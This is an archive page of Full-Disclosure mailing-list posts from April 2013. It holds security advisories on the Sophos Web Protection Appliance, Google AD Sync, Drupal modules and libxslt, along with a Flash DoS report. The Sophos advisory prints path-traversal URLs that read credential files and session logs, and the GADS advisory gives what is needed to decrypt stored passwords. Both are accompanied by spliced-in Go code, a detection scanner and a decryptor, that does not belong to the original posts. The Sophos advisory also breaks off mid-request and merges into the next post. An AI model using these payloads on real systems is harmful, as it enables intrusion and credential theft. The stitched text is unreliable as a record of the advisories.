[Full-disclosure] SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance

2013-04-03 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Sophos Web Protection Appliance
 vulnerable version: <= 3.7.8.1
      fixed version: 3.7.8.2
             impact: Critical
         CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643
           homepage: http://www.sophos.com/
              found: 2013-01-14
                 by: Wolfgang Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------------------------------------------------
Our award-winning Secure Web Gateway appliances make web protection easy.
They are quick to setup, simple to manage and make policy administration a
snap, even for non-technical users.

URL: http://www.sophos.com/en-us/products/web/web-protection.aspx


Business recommendation:
-----------------------------------------------------------------------
SEC Consult has identified several vulnerabilities within the components of
the Sophos Web Protection Appliance in the course of a short crash test. Some
components have been spot-checked, while others have not been tested at all.

An attacker can get unauthorized access to the appliance and plant backdoors or
access configuration files containing credentials for other systems (eg. Active
Directory/FTP login) which can be used in further attacks.
Since all web traffic passes through the appliance, interception of HTTP as
well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),
including sensitive information like passwords and session Cookies is possible.
If HTTPS Scanning is enabled, the appliance holds a private key for a
Certificate Authority (CA) certificate that is installed/trusted on all
workstations in the company. If this private key is compromised by an attacker,
arbitrary certificates can be signed. These certificates will then pass
validation on the client machines, enabling various attacks targeting
clients (MITM, phishing, evilgrade, ...).

The recommendation of SEC Consult is to switch off the product until a
comprehensive security audit based on a security source code review has been
performed and all identified security deficiencies have been resolved by the
vendor.

Vulnerability overview/description:
-----------------------------------------------------------------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the spiderman operating system user. These files include
configuration files containing sensitive information such as clear text
passwords which can be used in other attacks.
Furthermore the webserver log file which holds valid PHP session IDs can be
accessed. With this information administrator users can be impersonated.

2) OS command injection (CVE-2013-2642)
Authenticated users can execute arbitrary commands on the underlying
operating system with the privileges of the spiderman operating system user.
This can be used to gain persistent access to the affected system (e.g. by
planting backdoors), to access all kinds of locally stored information or to
intercept web traffic that passes through the appliance.
Unauthenticated users can exploit this kind of vulnerability too (depends on
appliance configuration).

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
Reflected Cross Site Scripting vulnerabilities were found. An attacker can use
these vulnerabilities to exploit other vulnerabilities in the web interface
or to conduct phishing attacks.


Proof of concept:
-----------------------------------------------------------------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file
containing the salted hash of the administrator password as well as clear text
passwords e.g. for FTP backup storage or Active Directory authentication:

https://host/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Furthermore the Apache access log can be retrieved. As PHP session IDs are
passed via the URL rather than via Cookies, these can be found in this log
file and effectively used to impersonate administrator users:

https://host/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

An excerpt from the log file shows that it contains PHP session ID information
(parameter STYLE):

host - - [21/Feb/2013:17:02:17 +] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://host/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
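A defender-side detection pass over access-log lines in the layout shown above, added here as an example; it is not part of the SEC Consult advisory or of Sophos' own tooling. It flags the two conditions the advisory describes: traversal or a null byte in the patience.cgi id parameter, and the STYLE session parameter landing in the request URL or the Referer field. The log lines are constructed, and the combined-log regex and field positions are assumptions of this example.

```go
package main

import (
	"net/url"
	"regexp"
	"strings"
)

// Constructed sample lines in Apache combined-log layout, modelled on the
// ui_access_log excerpt in the advisory; they are not real appliance logs.
var sampleLog = []string{
	`host - - [21/Feb/2013:17:02:17 +0000] "GET /cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 HTTP/1.1" 200 4096 "-" "curl/7.29.0"`,
	`host - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://host/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"`,
	`host - - [21/Feb/2013:17:03:01 +0000] "GET /cgi-bin/patience.cgi?id=report.txt HTTP/1.1" 200 88 "-" "Mozilla/5.0"`,
}

// client ident user [time] "method path proto" status size "referer" "agent"
var logRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$`)

type Finding struct {
	Line   int
	Client string
	Reason string
}

// sessionInQuery reports whether a URL carries the STYLE parameter, which the
// advisory identifies as the PHP session ID passed in the URL.
func sessionInQuery(raw string) bool {
	u, err := url.Parse(raw)
	return err == nil && u.Query().Get("STYLE") != ""
}

// inspectLine checks one line for the conditions the advisory describes:
// traversal or a null byte in the patience.cgi id parameter, and a session ID
// recorded in the request URL or the Referer field.
func inspectLine(n int, line string) []Finding {
	m := logRe.FindStringSubmatch(line)
	if m == nil {
		return nil // not a combined-format line; skip rather than guess
	}
	client, rawPath, referer := m[1], m[3], m[5]
	var out []Finding
	add := func(reason string) { out = append(out, Finding{n, client, reason}) }
	if u, err := url.Parse(rawPath); err == nil && strings.HasSuffix(u.Path, "/cgi-bin/patience.cgi") {
		id := u.Query().Get("id") // Query() percent-decodes, so %2e%2e and %00 are normalised
		if strings.Contains(id, "..") {
			add("directory traversal in patience.cgi id parameter")
		}
		if strings.ContainsRune(id, 0) {
			add("null byte in patience.cgi id parameter")
		}
	}
	if sessionInQuery(rawPath) || (referer != "-" && sessionInQuery(referer)) {
		add("PHP session ID (STYLE parameter) written to the access log")
	}
	return out
}

// scanLog runs inspectLine over every line and collects the findings.
func scanLog(lines []string) []Finding {
	var all []Finding
	for i, l := range lines {
		all = append(all, inspectLine(i+1, l)...)
	}
	return all
}
```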


2) OS command injection (CVE-2013-2642)
The Diagnostic Tools functionality allows an authenticated user to inject
arbitrary operating system commands enclosed in backticks (`). These commands
are run with the privileges of the operating system user spiderman:

POST /index.php?c=diagnostic_tools HTTP/1.1
Host

[Full-disclosure] Google AD Sync Tool - Exposure of Sensitive Information Vulnerability

2013-04-03 Thread Lists

Sense of Security - Security Advisory - SOS-13-001

Release Date.              03-Apr-2013
Last Update.               -
Vendor Notification Date.  03-Sep-2012
Product.                   Google Active Directory Sync (GADS) Tool
Platform.                  Windows, Linux, Solaris

Affected versions.         All versions up to 3.1.3
Severity Rating.           High
Impact.                    Exposure of sensitive information
Attack Vector.             From local without authentication
Solution Status.           Upgrade to version 3.1.6
CVE reference.             CVE - not yet assigned

Details.
Due to a weakness in the way the Java encryption algorithm
(PBEwithMD5andDES) has been implemented in the GADS tool, all
stored credentials can be decrypted into plain text. This
includes all of the encrypted passwords stored in any end user's
saved XML configuration file, such as Active Directory accounts,
SMTP and proxy details, LDAP and OAuth tokens, etc.

Proof of Concept.
The following information from the XML file and the GADS tool is
sufficient to decrypt every encrypted password in any saved XML:

1. The hard-coded salt:
   SALT[] = { -87, -101, -56, 50, 86, 53, -29, 3 }
2. The hard-coded DES iteration count:
   ITERATION_COUNT = 20
3. The secret key derived from the uniqueID value in the XML:
   6512630db9a74d90a5531f574b85f398
4. The cipher text from the XML:
   <encryptedAdminPassword>1edOUtamjNA=</encryptedAdminPassword>
5. The algorithm: PBEwithMD5andDES

The decrypted value is: winning!
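The scheme named above is PKCS#5 v1.5 PBES1: PBKDF1 with MD5 to derive a DES key and IV, then DES-CBC with PKCS#5 padding. The Go block below implements it as an added example; it is not the GADS tool's or Sense of Security's code. It uses the advisory's salt, iteration count and key string, assumes the key string is fed to PBKDF1 as ASCII bytes (as Java's PBEKeySpec does for ASCII input), and generates its own ciphertext instead of reusing the one quoted from the XML. The point it shows is that with a hard-coded salt the key and IV follow entirely from the uniqueID-derived string stored beside the ciphertext, and equal secrets always encrypt to identical output.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/md5"
	"encoding/base64"
	"errors"
)

// Values the advisory reports as hard-coded in the GADS tool; the Java byte
// array {-87, -101, -56, 50, 86, 53, -29, 3} is written as unsigned bytes.
var gadsSalt = []byte{0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x35, 0xe3, 0x03}
const gadsIterations = 20

// pbkdf1MD5 is PKCS#5 v1.5 PBKDF1 with MD5 (Java's PBEWithMD5AndDES):
// T1 = MD5(P || S), Ti = MD5(Ti-1); first 8 bytes are the DES key, last 8 the IV.
func pbkdf1MD5(password string, salt []byte, iterations int) (key, iv []byte) {
	t := md5.Sum(append([]byte(password), salt...))
	for i := 1; i < iterations; i++ {
		t = md5.Sum(t[:])
	}
	return t[:8], t[8:]
}

// pbes1Encrypt reproduces what the tool stores: DES-CBC with PKCS#5 padding,
// key and IV both fixed by (password, hard-coded salt), base64-encoded.
func pbes1Encrypt(password string, plaintext []byte) (string, error) {
	key, iv := pbkdf1MD5(password, gadsSalt, gadsIterations)
	block, err := des.NewCipher(key)
	if err != nil {
		return "", err
	}
	pad := des.BlockSize - len(plaintext)%des.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// pbes1Decrypt is the inverse; anyone holding the constants above plus the
// uniqueID from the same XML file can run it, which is the advisory's point.
func pbes1Decrypt(password, b64 string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of DES blocks")
	}
	key, iv := pbkdf1MD5(password, gadsSalt, gadsIterations)
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > des.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad PKCS#5 padding: wrong key or corrupt data")
	}
	return pt[:len(pt)-pad], nil
}
```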

Solution.
Upgrade to version 3.1.6

Discovered by.
Nathaniel Carew from Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: i...@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [Security-news] SA-CONTRIB-2013-040 - Commerce Skrill (Formerly Moneybookers) - Access bypass

2013-04-03 Thread security-news
View online: http://drupal.org/node/1960338

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-040
  * Project: Commerce Skrill (Formerly Moneybookers) [1] (third-party module)
  * Version: 7.x
  * Date: 2013-April-03
  * Security risk: Critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION
---------------------------------------------------------------------------

This module integrates the Skrill online payment services [3] with Drupal
Commerce.

When processing Instant payment notifications (IPN), the Moneybookers
enterprise payment method provided by the Commerce Skrill contributed module
does not perform sufficient access checking, potentially allowing forged
notifications to be accepted as valid.

The vulnerability is mitigated by the fact that it only affects the
Moneybookers enterprise payment method.


CVE IDENTIFIER(S) ISSUED
---------------------------------------------------------------------------

  * /A CVE identifier [4] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

VERSIONS AFFECTED
---------------------------------------------------------------------------

The Moneybookers enterprise payment method provided by the Commerce Skrill
[5] contributed module in all versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Commerce
Skrill (Formerly Moneybookers) [6] module, there is nothing you need to do.

SOLUTION
---------------------------------------------------------------------------

Install the latest version. The Moneybookers enterprise payment method now
requires the use of the hash security option.

  * Upgrade to Commerce Skrill 7.x-1.2 [7]
  * Go to the Skrill back office and enable securityHash verification under
the Administration > Processing > Processing Settings section.
  * Get the security token, and paste it in the Secret key field of the
payment method configuration form.

Also see the Commerce Skrill (Formerly Moneybookers) [8] project page.

REPORTED BY
---------------------------------------------------------------------------

  * Julien Dubreuil [9] the module maintainer

FIXED BY
---------------------------------------------------------------------------

  * Julien Dubreuil [10] the module maintainer
  * Jonathan Sacksick [11] the module maintainer

COORDINATED BY
---------------------------------------------------------------------------

  * Klaus Purer [12] of the Drupal Security Team

CONTACT AND MORE INFORMATION
---------------------------------------------------------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [13].

Learn more about the Drupal Security team and their policies [14], writing
secure code for Drupal [15], and securing your site [16].


[1] http://drupal.org/project/commerce_moneybookers
[2] http://drupal.org/security-team/risk-levels
[3] https://www.moneybookers.com/ads/partners/?p=Drupalcommerce
[4] http://cve.mitre.org/
[5] http://drupal.org/project/commerce_moneybookers
[6] http://drupal.org/project/commerce_moneybookers
[7] http://drupal.org/node/1959998
[8] http://drupal.org/project/commerce_moneybookers
[9] http://drupal.org/user/519520
[10] http://drupal.org/user/519520
[11] http://drupal.org/user/972218
[12] http://drupal.org/user/262198
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news



[Full-disclosure] [Security-news] SA-CONTRIB-2013-041 - Chaos tool suite (ctools) - Access bypass

2013-04-03 Thread security-news
View online: http://drupal.org/node/1960406

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-041
  * Project: Chaos tool suite (ctools) [1] (third-party module)
  * Version: 7.x
  * Date: 2013-April-03
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION
---------------------------------------------------------------------------

This CTools module provides a set of APIs and tools to improve the developer
experience.

The module doesn't sufficiently enforce node access when providing an
autocomplete list of suggested node titles, allowing users with the access
content permission to see the titles of nodes which they should not be able
to view.


CVE IDENTIFIER(S) ISSUED
---------------------------------------------------------------------------

  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

VERSIONS AFFECTED
---------------------------------------------------------------------------

  * Chaos tool suite (ctools) 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Chaos tool
suite (ctools) [4] module, there is nothing you need to do.

SOLUTION
---------------------------------------------------------------------------

Install the latest version:

  * If you use the Ctools module for Drupal 7.x, upgrade to Ctools 7.x-1.3 [5]

Also see the Chaos tool suite (ctools) [6] project page.

REPORTED BY
---------------------------------------------------------------------------

  * Greg Knaddison [7] of the Drupal Security Team
  * Cash Williams [8]

FIXED BY
---------------------------------------------------------------------------

  * Daniel Wehner [9] the module maintainer.
  * Cash Williams [10]
  * Lee Rowlands [11] of the Drupal Security Team

COORDINATED BY
---------------------------------------------------------------------------

  * Lee Rowlands [12] of the Drupal Security Team
  * Greg Knaddison [13] of the Drupal Security Team
  * Ben Jeavons [14] of the Drupal Security Team

CONTACT AND MORE INFORMATION
---------------------------------------------------------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [15].

Learn more about the Drupal Security team and their policies [16], writing
secure code for Drupal [17], and securing your site [18].


[1] http://drupal.org/project/ctools
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/ctools
[5] http://drupal.org/node/1960424
[6] http://drupal.org/project/ctools
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/421070
[9] http://drupal.org/user/99340
[10] http://drupal.org/user/421070
[11] http://drupal.org/user/395439
[12] http://drupal.org/user/395439
[13] http://drupal.org/user/36762
[14] http://drupal.org/user/91990
[15] http://drupal.org/contact
[16] http://drupal.org/security-team
[17] http://drupal.org/writing-secure-code
[18] http://drupal.org/security/secure-configuration



[Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)

2013-04-03 Thread MustLive

Hello list!

I want to warn you about a Denial of Service vulnerability (BSOD) in Adobe
Flash Player. I found this vulnerability on 27.01.2013.

----------------------
Affected products:
----------------------

The vulnerable version is Adobe Flash 11.5.502.146. The attack works only on
AMD/ATI video cards.

Adobe fixed it on 12.02.2013 in their patch APSB13-05
(https://www.adobe.com/support/security/bulletins/apsb13-05.html), which
fixed multiple vulnerabilities in Flash Player. Adobe did this quietly,
without mentioning this vulnerability and without crediting me. After I
informed them at the end of January, they were checking it for 1.5 months
and said that they can't reproduce this vulnerability (whereas I have
reproduced it on multiple computers with ATI video cards), that they don't
know anything about it (the hole was accidentally fixed in APSB13-05) and
that this DoS is not related to them.

----------------------
Details:
----------------------

Denial of Service (WASC-10):

This is a Denial of Service vulnerability which leads to a crash of the
operating system (tested on Windows XP and 7).

Here is a video which demonstrates this vulnerability in Flash:

http://www.youtube.com/watch?v=xi29KZ3LD80

This is a memory corruption (access violation) vulnerability, which can be
used for BSOD and potentially for remote code execution.

The flash file used for the attack is the VideoJS Flash Component from
Zencoder. I informed the developers of this video player already at the
beginning of February.

The attack works in the browsers Firefox and Opera (but the BSOD works only
in Firefox):

In Mozilla Firefox 15.0.1 and 18.0.1 - freezing of the browser (which can't
be closed) and BSOD of the system.
In Mozilla Firefox 3.0.19 and 10.0.7 ESR - no problems (all works normally).
In Opera 10.62 - freezing of the browser (which can be closed).

PoC/Exploit:

http://websecurity.com.ua/uploads/2013/Adobe%20Flash%20DoS%20BSOD.rar

To start the exploit, it needs to be placed on a web server (e.g. on
localhost); put any mp4 file under the name poc.mp4 next to poc.htm and open
the htm file (from the web server). Then click on the speaker image or on the
area of the video player.


Timeline:
----------------------

2013.01.27 - found the vulnerability.
2013.01.28 - recorded a video PoC, and that night informed the developers.
2013.02.01 - informed the developers again, because they didn't answer. After
that Adobe answered the first letter.
2013.02.08 - informed the developers of VideoJS.
2013.02.12 - Adobe fixed the vulnerability and released the patch, but was
still investigating.
2013.02-03 - during February-March, while Adobe was investigating this
vulnerability, I sent them information about the different tested computers
where the hole was working (on ATI cards) and was not working (on nVidia
cards), and sent them all the information they needed.
2013.03.02 - announced at my site.
2013.03.13 - Adobe finished the investigation.
2013.04.03 - disclosed at my site (http://websecurity.com.ua/6364/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 





[Full-disclosure] [SECURITY] [DSA 2654-1] libxslt security update

2013-04-03 Thread Salvatore Bonaccorso
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2654-1                   secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
April 03, 2013                                 http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: libxslt
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-6139
Debian Bug : 703933

Nicolas Gregoire discovered that libxslt, an XSLT processing runtime
library, is prone to denial of service vulnerabilities via crafted XSL
stylesheets.

For the stable distribution (squeeze), this problem has been fixed in
version 1.1.26-6+squeeze3.

For the testing distribution (wheezy), this problem has been fixed in
version 1.1.26-14.1.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.26-14.1.

We recommend that you upgrade your libxslt packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] Hackersh 0.1 Release Announcement

2013-04-03 Thread Itzik Kotler
Hi All,

I am pleased to announce the first version of Hackersh (
http://www.hackersh.org).

Hackersh (Hacker Shell) is a free and open source shell (command
interpreter) written in Python with built-in security commands, and
out-of-the-box wrappers for various security tools, using Pythonect as its
scripting engine. Pythonect is a new, experimental, general-purpose
high-level dataflow programming language based on Python. It aims to
combine the intuitive feel of shell scripting (and all of its perks like
implicit parallelism) with the flexibility and agility of Python.

The combination of the two makes:

"http://localhost" -> url -> nmap -> w3af -> print

an actual workflow that takes 'http://localhost', parses it as a URL, scans
it for open ports (via Nmap), and for each HTTP service launches a
separate web vulnerability scan (via W3af).

Curious about the output? Here's a screenshot:
http://hackersh.org/hackersh000dev0_1.png

Hackersh is not limited to penetration testing and can be applied to other
security domains including but not limited to: malware analysis,
vulnerability development and intelligence gathering (OSINT).

You can read more about Hackersh and its features at:
http://blog.ikotler.org/2013/04/hackersh-01-release-announcement.html

If you have any questions, do not hesitate to contact me.

Regards,
Itzik Kotler | http://www.ikotler.org

Re: [Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)

2013-04-03 Thread Jann Horn
On Thu, Apr 04, 2013 at 01:24:29AM +0300, MustLive wrote:
> Hello list!
> 
> I want to warn you about a Denial of Service vulnerability (BSOD) in Adobe
> Flash Player. I found this vulnerability on 27.01.2013.
> 
> ----------------------
> Affected products:
> ----------------------
> 
> The vulnerable version is Adobe Flash 11.5.502.146. The attack works only on
> AMD/ATI video cards.
> 
> Adobe fixed it on 12.02.2013 in their patch APSB13-05
> (https://www.adobe.com/support/security/bulletins/apsb13-05.html), which
> fixed multiple vulnerabilities in Flash Player. Adobe did this quietly,
> without mentioning this vulnerability and without crediting me. After I
> informed them at the end of January, they were checking it for 1.5 months
> and said that they can't reproduce this vulnerability (whereas I have
> reproduced it on multiple computers with ATI video cards), that they don't
> know anything about it (the hole was accidentally fixed in APSB13-05) and
> that this DoS is not related to them.

Sorry, but how can this be a vuln in *Flash*, a *user-space* component, if it
can be used to cause a BSOD, which, as far as I know, means that something bad
happened *in the Kernel*? Sounds to me as if Flash is not the (or at least not
the only) culprit...


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/